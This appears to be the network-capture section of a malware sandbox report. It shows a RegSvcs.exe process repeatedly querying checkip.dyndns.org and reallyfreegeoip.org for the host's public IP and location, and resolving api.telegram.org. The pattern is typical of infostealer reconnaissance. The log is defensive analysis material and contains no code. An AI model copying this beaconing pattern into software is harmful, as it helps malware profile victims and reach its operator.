Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:01.312005043 CET | 1.1.1.1 | 192.168.2.4 | 0xd6e7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:03.674097061 CET | 1.1.1.1 | 192.168.2.4 | 0x969c | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:03.674097061 CET | 1.1.1.1 | 192.168.2.4 | 0x969c | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 08:59:29.641657114 CET | 1.1.1.1 | 192.168.2.4 | 0x9cce | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:01.438780069 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 11, 2024 08:59:02.743061066 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0073403c5298b954b0d1c39580ca7ffd
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 11, 2024 08:59:02.747498989 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 11, 2024 08:59:03.171295881 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 376c2ce2d6c3e1d8cb084aeabaaf09c0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 11, 2024 08:59:05.477065086 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 11, 2024 08:59:05.905229092 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e24c0c9f92e6fec416f9dbc26e4f1dcd
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:07.692929029 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 11, 2024 08:59:08.997108936 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b954805518e0fd4a2ca628028088df6f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:10.779278040 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 11, 2024 08:59:12.083074093 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 23027fcc77eef91bab177e14b89a83e8
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:13.871773958 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 11, 2024 08:59:15.217556000 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: de05d29aa4db4772d2fce5c8c54099cb
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:17.039071083 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 11, 2024 08:59:18.355011940 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:18 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 03b2ee4259c3f98e83ce8e093067f51d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:20.220731974 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 11, 2024 08:59:21.540848970 CET | 321 | IN | HTTP/1.1 200 OK
Date: Wed, 11 Dec 2024 07:59:21 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b38959b95a84d1e511016daa1661853a
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:23.370296001 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 11, 2024 08:59:24.676857948 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:24 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: eec97b0962829dded16c5c9b76ebd51e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49751 | 132.226.247.73 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 11, 2024 08:59:26.490787029 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 11, 2024 08:59:27.799544096 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:27 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 441f3102a3b99f3cc3b19208404ba2d3
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.67.152 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:59:05 UTC | 85 | OUT | GET /xml/8.46.123.175 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-11 07:59:05 UTC | 880 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:05 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 83268
    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3bwKEhSHJf6xbIdkxhs7td%2BpRL%2FGttPyEkz6KkQiEQHZ%2BOjjN1vriJCdIW4ZhpJol6J%2FaCcptsq9tJFl2EPgR7nCzzrP0OAHjB%2FshJGtF7UxTII4cmIHYu0eBJ55z1XnygMOaT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f03eeea0bf04391-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=4879&min_rtt=1787&rtt_var=2687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1634023&cwnd=236&unsent_bytes=0&cid=c03dad95ef3f56db&ts=451&x=0"
2024-12-11 07:59:05 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 104.21.67.152 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:59:07 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-11 07:59:07 UTC | 873 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:07 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 83270
    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vaUXHoXyazQ2aXzW5wkdaIWsq54Yb4BBXb%2BxfxTnJjBu40IAPu4NwVXsOycBz8TlHMReH6iKnlopHzUfFy4TsnBHPfiIj06J9mm6CsLDSYil8KlVoBblUXoyxEWv4bG%2BO7lhzO5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f03eef738b15e78-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1680&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1711606&cwnd=252&unsent_bytes=0&cid=45f163553af2eb58&ts=456&x=0"
2024-12-11 07:59:07 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 104.21.67.152 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:59:10 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-11 07:59:10 UTC | 879 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:10 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 83273
    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEEDgyqBHpuM2C9JztC6eoogRu16hFZT%2FaG58ZDGt%2BJuXPIpZdK8g5eD5cqFqKDgQwu75z%2B78Xbceil7Fw3PrEK2KRoJI%2BqmGUql9qAdzNVbMcsP%2BSvcvJTMRfpiL74kc4iwJvEo"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f03ef0a8cc741e9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1753&rtt_var=668&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1624026&cwnd=249&unsent_bytes=0&cid=7ea6ae45c67588db&ts=451&x=0"
2024-12-11 07:59:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 104.21.67.152 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:59:13 UTC | 85 | OUT | GET /xml/8.46.123.175 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-11 07:59:13 UTC | 873 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:13 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 83276
    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqnNYs6OssY6gAJcGjh1v0ZEmKOu83uPLYMQLBVl07CLuVjY7XTkXTwQAMnrDULYIEvMpI9vMOSuXAHJ2mlE50IE8%2BBD1wEzVN2%2FDKijbxkjRsnPx6lZoCFt75qy2AxMAFqgG8wc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f03ef1ddec243ac-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1742&rtt_var=665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1632196&cwnd=181&unsent_bytes=0&cid=df25c03405110996&ts=448&x=0"
2024-12-11 07:59:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 104.21.67.152 | 443 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-11 07:59:16 UTC | 61 | OUT | GET /xml/8.46.123.175 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-11 07:59:16 UTC | 883 | IN | HTTP/1.1 200 OK
    Date: Wed, 11 Dec 2024 07:59:16 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 83279
    Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKtXIsGpOQ%2BEVrlVucz6%2FODIVQ8hYAkAbk%2BPXEZsB%2F9YdP5TgoItVjuHXi%2BsO71H5%2BXAt1fzasJsctrDRoh663R%2FjtHh2aph47V111A2ouvrJB74KXawXLa3wYMwzXy6Mw7ZfMV4"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f03ef319bb38cc0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1815&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1593886&cwnd=219&unsent_bytes=0&cid=d5daced961dd3b88&ts=473&x=0"
